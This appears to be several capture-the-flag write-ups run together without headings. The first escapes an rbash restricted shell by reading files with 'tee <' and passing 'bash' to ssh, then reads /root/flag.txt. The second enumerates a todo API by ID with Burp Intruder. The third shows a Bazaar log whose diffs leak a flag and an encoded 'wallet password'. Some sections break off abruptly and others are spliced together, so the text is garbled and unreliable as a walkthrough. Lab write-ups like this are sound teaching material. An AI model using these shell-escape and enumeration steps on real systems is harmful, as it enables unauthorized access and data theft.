For this challenge we are in a restricted shell called rbash (for restricted bash) and our goal is to escape or bypass this restriction to get the flag.
For those who are unfamiliar with rbash, here what it is:
It limits a user's ability and only allows them to perform a subset of system commands. Typically, a combination of some or all of the following restrictions are imposed by a restricted shell:
Using the 'cd' command to change directories.
Setting or unsetting certain environment variables (i.e. SHELL, PATH, etc...).
Specifying command names that contain slashes.
Specifying a filename containing a slash as an argument to the '.' built-in command.
Specifying a filename containing a slash as an argument to the '-p' option to the 'hash' built-in command.
Importing function definitions from the shell environment at startup.
Parsing the value of SHELLOPTS from the shell environment at startup.
Redirecting output using the '>', '>|', ", '>&', '&>', and '>>' redirection operators.
Using the 'exec' built-in to replace the shell with another command.
Adding or deleting built-in commands with the '-f' and '-d' options to the enable built-in.
Using the 'enable' built-in command to enable disabled shell built-ins.
Specifying the '-p' option to the 'command' built-in.
Turning off restricted mode with 'set +r' or 'set +o restricted'.
ctf@cb693b5f1ec5:~$ source .bashrc -rbash: dircolors: command not found -rbash: /bin/bash: restricted: cannot specify `/' in command names
We can't either.
By pressing two times <TAB> we can list available commands in our environment:
1 2 3 4 5
ctf@cb693b5f1ec5:~$ <TAB> <TAB> ! [[ bg caller compgen coproc do elif eval false fi grep if l local popd read select source then true umask wait ./ ]] bind case complete declare done else exec fc for hash in la logout printf readarray set suspend time type unalias while : alert break cd compopt dirs echo enable exit fg function help jobs let ls pushd readonly shift tee times typeset unset { [ alias builtin command continue disown egrep esac export fgrep getopts history kill ll mapfile pwd return shopt test trap ulimit until }
Note that exec for example is present but disallowed.
ctf@29a879d73211:~$ tee < .profile # ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022
# if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi
# set PATH so it includes user's private bin directories
This works! Noice! We have replaced cat by tee < <file>, we are now enable to read any files.
There is nothing interesting in .bashrc.
So now we can easily find where the flag is and print it:
1 2 3 4 5
ctf@1f7bcf5d48c3:~$ echo /root/* /root/flag.txt
ctf@1f7bcf5d48c3:~$ tee < /root/flag.txt MCA{ieHaisoh4eif2ae}
For those who did Restricted shells challenge on root-me, you probably know there are a lot of command that allow to invoke a shell and make command execution.
A trivial way is to specify a command to execute after the ssh connection command:
1 2
% ssh ctf@138.247.13.108 id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
So we have only to invoke bash for example:
1
% ssh ctf@138.247.13.108 bash
We now are out of rbash. Let's see where the flag can be:
1 2 3 4 5 6 7 8
ls -lhA /root total 12K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 21 Feb 19 16:32 flag.txt
Where we can do a CTRL + U to display the source code as always.
We can see there are two custom JavaScript script included:
lists.js is the one that get our interest, at the end of the script we can read:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
// send put request using the data of the get for the same id var todoURL = '/api/todos/' + todoID + '/' $.getJSON(todoURL, function(data) { data.is_finished = isFinished; if (isFinished) { data.finished_at = moment().toISOString(); } else { data.finished_at = null; } $.ajax({ url: todoURL, type: 'PUT', contentType: 'application/json', data: JSON.stringify(data), success: function() { location.reload(); } });
We can access the private data including the description of every todo liek that:
1 2
% curl http://138.247.13.110/api/todos/42/ {"id":42,"todolist":42,"description":"The important things are children, honesty, integrity and faith.","created_at":null,"is_finished":false,"finished_at":null}
So I used the Intruder of Burp Suit to request http://138.247.13.110/api/todos/<id>/ for <id> from 1 to 1000 and match any content containing MCA{:
% bzr log -p index.php ------------------------------------------------------------ revno: 167 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 18:00:21 -0500 message: Oops diff: === modified file 'index.php' --- index.php 2018-12-06 23:00:02 +0000 +++ index.php 2018-12-06 23:00:21 +0000 @@ -28,5 +28,4 @@ ?> </div> </body> -</html> -<!-- 6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077 --> \ No newline at end of file +</html> \ No newline at end of file ------------------------------------------------------------ revno: 166 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 18:00:02 -0500 message: CentOS is just RedHat diff: === modified file 'index.php' --- index.php 2018-12-06 22:54:52 +0000 +++ index.php 2018-12-06 23:00:02 +0000 @@ -10,6 +10,8 @@ <h1 class="display-4">My Blog</h1> <p class="lead">Just a spot for me to talk about how much I love Canonical</p> </div> + <h1>CentOS is just RedHat</h1> + <p>A friend of mine was explaining how the company he works for pays for RedHat. I don't understand why they are LITERALLY throwing their money away since CentOS is just RedHat. In fact, CentOS is even better than RedHat since it discovers the fastest mirror automatically. I'm applying for one of their open job reqs just to give them a piece of my mind.</p> <h1>I love Canonical</h1> <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> <ul> @@ -26,4 +28,5 @@ ?> </div> </body> -</html> \ No newline at end of file +</html> +<!-- 6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077 --> \ No newline at end of file ------------------------------------------------------------ revno: 156 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 17:54:52 -0500 message: Nevermind on the blog post diff: === modified file 'index.php' --- index.php 2018-12-06 22:52:42 +0000 +++ index.php 2018-12-06 22:54:52 +0000 @@ -10,11 +10,6 @@ <h1 class="display-4">My Blog</h1> <p class="lead">Just a spot for me to talk about how much I love Canonical</p> </div> - <h1>Encryption is so cool!</h1> - <p>It's so cool that I can paste a block of text here and if its encrypted then none of you will EVER be able to read it! After reading about it, I'm so comfortable with it that I'm willing to paste my Bitcoin Wallet password right here:</p> - <p>NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ==</p> - <p>There's like a whole 3 Bitcoin in there, but none of you will ever be able to get it!</p> - <hr> <h1>I love Canonical</h1> <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> <ul> ------------------------------------------------------------ revno: 155 committer: BZR Lover branch nick: filePathTraversalHard timestamp: Thu 2018-12-06 17:52:42 -0500 message: Add a new blog post! diff: === modified file 'index.php' --- index.php 2018-12-06 18:48:25 +0000 +++ index.php 2018-12-06 22:52:42 +0000 @@ -10,6 +10,11 @@ <h1 class="display-4">My Blog</h1> <p class="lead">Just a spot for me to talk about how much I love Canonical</p> </div> + <h1>Encryption is so cool!</h1> + <p>It's so cool that I can paste a block of text here and if its encrypted then none of you will EVER be able to read it! After reading about it, I'm so comfortable with it that I'm willing to paste my Bitcoin Wallet password right here:</p> + <p>NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ==</p> + <p>There's like a whole 3 Bitcoin in there, but none of you will ever be able to get it!</p> + <hr> <h1>I love Canonical</h1> <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> <ul> ------------------------------------------------------------ revno: 1 committer: BZR Lover branch nick: filePathTraversalEasy timestamp: Thu 2018-12-06 13:48:25 -0500 message: BZR is so cool! diff: === added file 'index.php' --- index.php 1970-01-01 00:00:00 +0000 +++ index.php 2018-12-06 18:48:25 +0000 @@ -0,0 +1,29 @@ +<html> + <head> + <title>My Blog</title> + <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> + </head> + <body> + + <div class="container"> + <div class="jumbotron"> + <h1 class="display-4">My Blog</h1> + <p class="lead">Just a spot for me to talk about how much I love Canonical</p> + </div> + <h1>I love Canonical</h1> + <p>As someone who is just getting started with Linux, I love Canonical. They build the easiest to use Linux distribution I can find, and they build so many useful tools. So far I've tried out</p> + <ul> + <li>Juju - The worlds best configuration management tool!</li> + <li>Bazaar - The worlds best version control!</li> + <li>Ubuntu - The worlds best OS!</li> + <li>Launchpad - GitHub? Gross!</li> + </ul> + <hr> + <h1>Learning PHP</h1> + <p>I recently learned about PHP and I can't stop switching everything over to it. In fact, this blog is now powered by PHP, I think! I changed the file extension at least, and added a little PHP code below here. That should pretty much do it right? I have the PHP code commented out for now since I can't seem to get it to work right. I'll have to look into it later.</p> + <?php + // Flag is MCA{canonical_is_literally_my_favorite_company_in_the_whole_world} + ?> + </div> + </body> +</html> \ No newline at end of file